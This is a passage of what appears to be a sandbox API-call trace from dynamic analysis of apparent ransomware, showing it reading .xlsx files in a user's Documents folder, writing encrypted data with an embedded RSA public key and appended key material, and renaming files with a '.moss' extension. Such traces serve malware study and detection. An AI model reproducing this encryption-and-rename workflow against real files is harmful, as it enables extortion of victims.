pdwDataLen=0x401fa54) returned 1 [0169.687] GetLastError () returned 0x0 [0169.687] CryptDestroyHash (hHash=0x362b8e0) returned 1 [0169.687] CryptReleaseContext (hProv=0xd2f030, dwFlags=0x0) returned 1 [0169.687] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b39e58 | out: hHeap=0xcd0000) returned 1 [0169.687] UuidCreate (in: Uuid=0x401fa48 | out: Uuid=0x401fa48) returned 0x0 [0169.687] UuidToStringA (in: Uuid=0x401fa48, StringUuid=0x401fa40 | out: StringUuid=0x401fa40) returned 0x0 [0169.688] RpcStringFreeA (in: String=0x401fa40 | out: String=0x401fa40) returned 0x0 [0169.688] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608a38 | out: hHeap=0xcd0000) returned 1 [0169.688] RtlReAllocateHeap (Heap=0xcd0000, Flags=0x0, Ptr=0x3b51ec0, Size=0x218) returned 0x3b5ed58 [0169.688] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x558) returned 0x3b7a6f8 [0169.688] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fbfc0 | out: hHeap=0xcd0000) returned 1 [0169.688] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fbfd8 | out: hHeap=0xcd0000) returned 1 [0169.688] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fbb70 | out: hHeap=0xcd0000) returned 1 [0169.688] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f9e20 | out: hHeap=0xcd0000) returned 1 [0169.688] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b7a6f8 | out: hHeap=0xcd0000) returned 1 [0169.689] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x35fbb70 [0169.689] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x8) returned 0x35fd310 [0169.689] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x10) returned 0x35fbfd8 [0169.689] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x18) returned 0x35e0a50 [0169.689] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x9) returned 0x35fbfc0 [0169.689] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x8) returned 0x35fd320 [0169.689] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x10e) returned 0xd57fe0 [0169.689] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c6d8 [0169.689] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x58) returned 0x3613610 [0169.689] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x14) returned 0x35e06d0 [0169.689] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x104) returned 0x3aa2470 [0169.689] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x14) returned 0x35e0a70 [0169.689] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd290 [0169.689] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd57fe0 | out: hHeap=0xcd0000) returned 1 [0169.689] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fbfd8 | out: hHeap=0xcd0000) returned 1 [0169.689] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd320 | out: hHeap=0xcd0000) returned 1 [0169.689] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fbfc0 | out: hHeap=0xcd0000) returned 1 [0169.689] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35e0a50 | out: hHeap=0xcd0000) returned 1 [0169.689] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd310 | out: hHeap=0xcd0000) returned 1 [0169.689] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fbb70 | out: hHeap=0xcd0000) returned 1 [0169.689] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c6d8 | out: hHeap=0xcd0000) returned 1 [0169.689] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x36136d0 | out: hHeap=0xcd0000) returned 1 [0169.689] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b5ed58 | out: hHeap=0xcd0000) returned 1 [0169.689] GetCurrentThreadId () returned 0x324 [0169.689] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x100) returned 0xd57fe0 [0169.689] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x82) returned 0xd32a20 [0169.689] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x2c) returned 0x3608a70 [0169.689] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2f030 [0169.689] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x148) returned 0x35deb08 [0169.689] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd310 [0169.689] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd320 [0169.689] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x100) returned 0x35ceae8 [0169.689] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x64) returned 0xdc82f8 [0169.690] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc82f8 | out: hHeap=0xcd0000) returned 1 [0169.690] GetCurrentThreadId () returned 0x324 [0169.690] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x64) returned 0xdc82f8 [0169.690] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc82f8 | out: hHeap=0xcd0000) returned 1 [0169.690] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xeb) returned 0xd23a00 [0169.690] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x64) returned 0xdc82f8 [0169.690] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc82f8 | out: hHeap=0xcd0000) returned 1 [0169.690] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x64) returned 0xdc82f8 [0169.690] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc82f8 | out: hHeap=0xcd0000) returned 1 [0169.690] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd23a00 | out: hHeap=0xcd0000) returned 1 [0169.690] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x100) returned 0xd23a00 [0169.690] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd310 | out: hHeap=0xcd0000) returned 1 [0169.690] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4c) returned 0x362c768 [0169.690] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd310 [0169.690] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x100) returned 0x35f7c30 [0169.690] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd330 [0169.690] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x35fbb70 [0169.690] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd330 | out: hHeap=0xcd0000) returned 1 [0169.690] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd330 [0169.690] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd2f0 [0169.690] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd300 [0169.690] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd2e0 [0169.690] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd2a0 [0169.690] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd280 [0169.690] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd2c0 [0169.690] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x35fbfc0 [0169.690] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd2f0 | out: hHeap=0xcd0000) returned 1 [0169.690] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x8) returned 0x35fd2f0 [0169.690] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd330 | out: hHeap=0xcd0000) returned 1 [0169.690] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd330 [0169.690] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd350 [0169.690] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd360 [0169.690] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd340 [0169.690] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x10) returned 0x35fbfd8 [0169.690] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd360 | out: hHeap=0xcd0000) returned 1 [0169.691] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x18) returned 0x35e0a50 [0169.691] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd350 | out: hHeap=0xcd0000) returned 1 [0169.691] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x35fbfa8 [0169.691] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd340 | out: hHeap=0xcd0000) returned 1 [0169.691] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x10) returned 0x35fbc90 [0169.691] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd330 | out: hHeap=0xcd0000) returned 1 [0169.691] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x8) returned 0x35fd330 [0169.691] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd280 | out: hHeap=0xcd0000) returned 1 [0169.691] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x35fbbe8 [0169.691] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd330 | out: hHeap=0xcd0000) returned 1 [0169.691] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x35fbc00 [0169.691] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd300 | out: hHeap=0xcd0000) returned 1 [0169.691] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x10) returned 0x35fbff0 [0169.691] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fbbe8 | out: hHeap=0xcd0000) returned 1 [0169.691] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x10) returned 0x35fbbe8 [0169.691] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fbc00 | out: hHeap=0xcd0000) returned 1 [0169.691] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x8) returned 0x35fd300 [0169.691] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd310 | out: hHeap=0xcd0000) returned 1 [0169.691] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x14) returned 0x35e0a10 [0169.691] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd300 | out: hHeap=0xcd0000) returned 1 [0169.691] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x1c) returned 0x3b3c6d8 [0169.691] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fbfc0 | out: hHeap=0xcd0000) returned 1 [0169.691] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x10) returned 0x35fbfc0 [0169.691] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd2f0 | out: hHeap=0xcd0000) returned 1 [0169.691] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x204) returned 0x3b449a8 [0169.691] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fbb70 | out: hHeap=0xcd0000) returned 1 [0169.691] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x108) returned 0x3aa2588 [0169.691] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fbbe8 | out: hHeap=0xcd0000) returned 1 [0169.691] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x210) returned 0x3b44bb8 [0169.691] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c6d8 | out: hHeap=0xcd0000) returned 1 [0169.691] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x10c) returned 0xdc53e8 [0169.691] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd2e0 | out: hHeap=0xcd0000) returned 1 [0169.691] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x108) returned 0x3aa26a0 [0169.691] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fbfc0 | out: hHeap=0xcd0000) returned 1 [0169.692] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x200) returned 0x3b7a6f8 [0169.692] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3aa2588 | out: hHeap=0xcd0000) returned 1 [0169.692] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x100) returned 0xd3e658 [0169.692] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd320 | out: hHeap=0xcd0000) returned 1 [0169.692] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2f030 | out: hHeap=0xcd0000) returned 1 [0169.692] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd23a00 | out: hHeap=0xcd0000) returned 1 [0169.692] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd3e658 | out: hHeap=0xcd0000) returned 1 [0169.692] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35e0a10 | out: hHeap=0xcd0000) returned 1 [0169.692] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3aa26a0 | out: hHeap=0xcd0000) returned 1 [0169.692] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b44bb8 | out: hHeap=0xcd0000) returned 1 [0169.692] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b7a6f8 | out: hHeap=0xcd0000) returned 1 [0169.692] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc53e8 | out: hHeap=0xcd0000) returned 1 [0169.692] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd2a0 | out: hHeap=0xcd0000) returned 1 [0169.692] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fbff0 | out: hHeap=0xcd0000) returned 1 [0169.692] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd2c0 | out: hHeap=0xcd0000) returned 1 [0169.692] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fbc90 | out: hHeap=0xcd0000) returned 1 [0169.692] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35e0a50 | out: hHeap=0xcd0000) returned 1 [0169.692] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fbfd8 | out: hHeap=0xcd0000) returned 1 [0169.692] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fbfa8 | out: hHeap=0xcd0000) returned 1 [0169.692] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35deb08 | out: hHeap=0xcd0000) returned 1 [0169.692] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608a70 | out: hHeap=0xcd0000) returned 1 [0169.692] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35ceae8 | out: hHeap=0xcd0000) returned 1 [0169.692] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fbf90 | out: hHeap=0xcd0000) returned 1 [0169.692] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b45980 | out: hHeap=0xcd0000) returned 1 [0169.692] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b449a8 | out: hHeap=0xcd0000) returned 1 [0169.692] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f7c30 | out: hHeap=0xcd0000) returned 1 [0169.692] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x362c768 | out: hHeap=0xcd0000) returned 1 [0169.692] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3aa2470 | out: hHeap=0xcd0000) returned 1 [0169.692] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35e06d0 | out: hHeap=0xcd0000) returned 1 [0169.693] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd290 | out: hHeap=0xcd0000) returned 1 [0169.693] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35e0a70 | out: hHeap=0xcd0000) returned 1 [0169.693] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3613610 | out: hHeap=0xcd0000) returned 1 [0169.693] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b447b0 | out: hHeap=0xcd0000) returned 1 [0169.693] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608b88 | out: hHeap=0xcd0000) returned 1 [0169.693] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b39e58 | out: hHeap=0xcd0000) returned 1 [0169.693] WriteFile (in: hFile=0x664, lpBuffer=0x3b62d40*, nNumberOfBytesToWrite=0x179af, lpNumberOfBytesWritten=0x401fb14, lpOverlapped=0x0 | out: lpBuffer=0x3b62d40*, lpNumberOfBytesWritten=0x401fb14*=0x179af, lpOverlapped=0x0) returned 1 [0169.693] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b62d40 | out: hHeap=0xcd0000) returned 1 [0169.693] SetFilePointerEx (in: hFile=0x664, liDistanceToMove=0x179b4, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0169.693] WriteFile (in: hFile=0x664, lpBuffer=0xd57fe0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x401fb50, lpOverlapped=0x0 | out: lpBuffer=0xd57fe0*, lpNumberOfBytesWritten=0x401fb50*=0x100, lpOverlapped=0x0) returned 1 [0169.693] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd57fe0 | out: hHeap=0xcd0000) returned 1 [0169.694] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x60) returned 0xd71b38 [0169.694] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x428) returned 0x3b447b0 [0169.694] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW", cchWideChar=-1, lpMultiByteStr=0x3b447b0, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW", lpUsedDefaultChar=0x0) returned 41 [0169.694] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x430) returned 0x3b48820 [0169.694] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b447b0 | out: hHeap=0xcd0000) returned 1 [0169.694] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd71b38 | out: hHeap=0xcd0000) returned 1 [0169.694] WriteFile (in: hFile=0x664, lpBuffer=0x3b48820*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x401fb50, lpOverlapped=0x0 | out: lpBuffer=0x3b48820*, lpNumberOfBytesWritten=0x401fb50*=0x28, lpOverlapped=0x0) returned 1 [0169.694] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b48820 | out: hHeap=0xcd0000) returned 1 [0169.694] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0169.694] WriteFile (in: hFile=0x664, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x401fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x401fb50*=0x26, lpOverlapped=0x0) returned 1 [0169.694] CloseHandle (hObject=0x664) returned 1 [0169.695] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2f030 [0169.696] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x890) returned 0x3b48820 [0169.696] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2f030 | out: hHeap=0xcd0000) returned 1 [0169.696] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FORbsqeG8F-z_NR.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\forbsqeg8f-z_nr.xlsx"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FORbsqeG8F-z_NR.xlsx.moss" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\forbsqeg8f-z_nr.xlsx.moss")) returned 1 [0169.712] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b48820 | out: hHeap=0xcd0000) returned 1 [0169.712] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608a38 | out: hHeap=0xcd0000) returned 1 [0169.712] VirtualFree (lpAddress=0x2d80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0169.713] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd80bd8 | out: hHeap=0xcd0000) returned 1 [0169.713] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7fca2e20, ftCreationTime.dwHighDateTime=0x1d58b87, ftLastAccessTime.dwLowDateTime=0x4dee0d80, ftLastAccessTime.dwHighDateTime=0x1d56757, ftLastWriteTime.dwLowDateTime=0x4dee0d80, ftLastWriteTime.dwHighDateTime=0x1d56757, nFileSizeHigh=0x0, nFileSizeLow=0x1002a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="gG42X1snm-IOrhlP.xlsx", cAlternateFileName="GG42X1~1.XLS")) returned 1 [0169.713] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x60) returned 0xd71b38 [0169.713] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x8e) returned 0xd80bd8 [0169.713] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd71b38 | out: hHeap=0xcd0000) returned 1 [0169.714] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\gG42X1snm-IOrhlP.xlsx") returned=".xlsx" [0169.714] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\gG42X1snm-IOrhlP.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\gg42x1snm-iorhlp.xlsx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x664 [0169.714] GetFileSizeEx (in: hFile=0x664, lpFileSize=0x401fb40 | out: lpFileSize=0x401fb40*=65578) returned 1 [0169.714] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2d80000 [0169.717] SetFilePointerEx (in: hFile=0x664, liDistanceToMove=0x10004, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0169.717] ReadFile (in: hFile=0x664, lpBuffer=0x2d80000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x401fb78, lpOverlapped=0x0 | out: lpBuffer=0x2d80000*, lpNumberOfBytesRead=0x401fb78*=0x26, lpOverlapped=0x0) returned 1 [0169.718] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x30) returned 0x3608a38 [0169.718] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608a38 | out: hHeap=0xcd0000) returned 1 [0169.718] SetFilePointer (in: hFile=0x664, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0169.718] ReadFile (in: hFile=0x664, lpBuffer=0x2d80000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x401fb70, lpOverlapped=0x0 | out: lpBuffer=0x2d80000*, lpNumberOfBytesRead=0x401fb70*=0x1002a, lpOverlapped=0x0) returned 1 [0169.718] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0169.718] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x1f3) returned 0x3b39e58 [0169.718] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0169.718] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0169.718] CryptAcquireContextW (in: phProv=0x401fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x401fa50*=0xd2f030) returned 1 [0169.719] CryptCreateHash (in: hProv=0xd2f030, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x401fa58 | out: phHash=0x401fa58) returned 1 [0169.719] CryptHashData (hHash=0x362b8e0, pbData=0x3b39e58, dwDataLen=0x1f3, dwFlags=0x0) returned 1 [0169.719] CryptGetHashParam (in: hHash=0x362b8e0, 